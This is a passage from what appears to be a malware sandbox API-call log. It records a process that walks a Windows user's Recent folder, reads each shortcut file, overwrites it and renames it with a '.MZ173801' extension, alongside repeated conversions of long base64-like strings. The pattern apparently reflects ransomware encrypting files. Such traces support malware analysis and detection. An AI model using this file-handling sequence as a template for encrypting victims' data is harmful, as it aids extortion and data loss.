lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0107.687] GetCurrentThreadId () returned 0x1358 [0107.687] GetCurrentThreadId () returned 0x1358 [0107.687] GetCurrentThreadId () returned 0x1358 [0107.687] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\dQSfhEFRy_gFg.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\dqsfhefry_gfg.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0107.687] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0107.687] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0107.687] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x408 [0107.687] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0107.688] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x408, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x408, lpOverlapped=0x0) returned 1 [0107.689] CloseHandle (hObject=0x3f4) returned 1 [0107.689] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\dQSfhEFRy_gFg.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\dqsfhefry_gfg.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0107.690] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x408, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x408, lpOverlapped=0x0) returned 1 [0107.691] CloseHandle (hObject=0x3f4) returned 1 [0107.692] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\dQSfhEFRy_gFg.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\dqsfhefry_gfg.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\dQSfhEFRy_gFg.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\dqsfhefry_gfg.lnk.mz173801")) returned 1 [0107.693] GetCurrentThreadId () returned 0x1358 [0107.693] GetCurrentThreadId () returned 0x1358 [0107.693] GetCurrentThreadId () returned 0x1358 [0107.693] GetCurrentThreadId () returned 0x1358 [0107.693] GetCurrentThreadId () returned 0x1358 [0107.693] GetCurrentThreadId () returned 0x1358 [0107.693] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3af699, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x7d49f8ae, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x7d49f8ae, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x50c, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Ds2vVA7R.lnk", cAlternateFileName="")) returned 1 [0107.693] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0107.693] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0107.693] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Ds2vVA7R.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\ds2vva7r.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3af699, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x7d49f8ae, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x7d49f8ae, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x50c)) returned 1 [0107.694] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0107.694] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0107.694] GetCurrentThreadId () returned 0x1358 [0107.694] GetCurrentThreadId () returned 0x1358 [0107.694] GetCurrentThreadId () returned 0x1358 [0107.695] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0107.695] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0107.695] GetCurrentThreadId () returned 0x1358 [0107.695] GetCurrentThreadId () returned 0x1358 [0107.695] GetCurrentThreadId () returned 0x1358 [0107.696] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Ds2vVA7R.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\ds2vva7r.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0107.696] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0107.696] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0107.696] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x50c [0107.696] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0107.696] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x50c, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x50c, lpOverlapped=0x0) returned 1 [0107.697] CloseHandle (hObject=0x3f4) returned 1 [0107.697] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Ds2vVA7R.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\ds2vva7r.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0107.698] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x50c, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x50c, lpOverlapped=0x0) returned 1 [0107.700] CloseHandle (hObject=0x3f4) returned 1 [0107.701] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Ds2vVA7R.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\ds2vva7r.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Ds2vVA7R.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\ds2vva7r.lnk.mz173801")) returned 1 [0107.701] GetCurrentThreadId () returned 0x1358 [0107.701] GetCurrentThreadId () returned 0x1358 [0107.701] GetCurrentThreadId () returned 0x1358 [0107.701] GetCurrentThreadId () returned 0x1358 [0107.701] GetCurrentThreadId () returned 0x1358 [0107.701] GetCurrentThreadId () returned 0x1358 [0107.701] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb819531, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb819531, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeb819531, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x440, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="E5xn1.ots.lnk", cAlternateFileName="E5XN1O~1.LNK")) returned 1 [0107.701] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0107.701] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0107.702] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\E5xn1.ots.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\e5xn1.ots.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb819531, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb819531, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeb819531, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x440)) returned 1 [0107.702] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0107.702] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 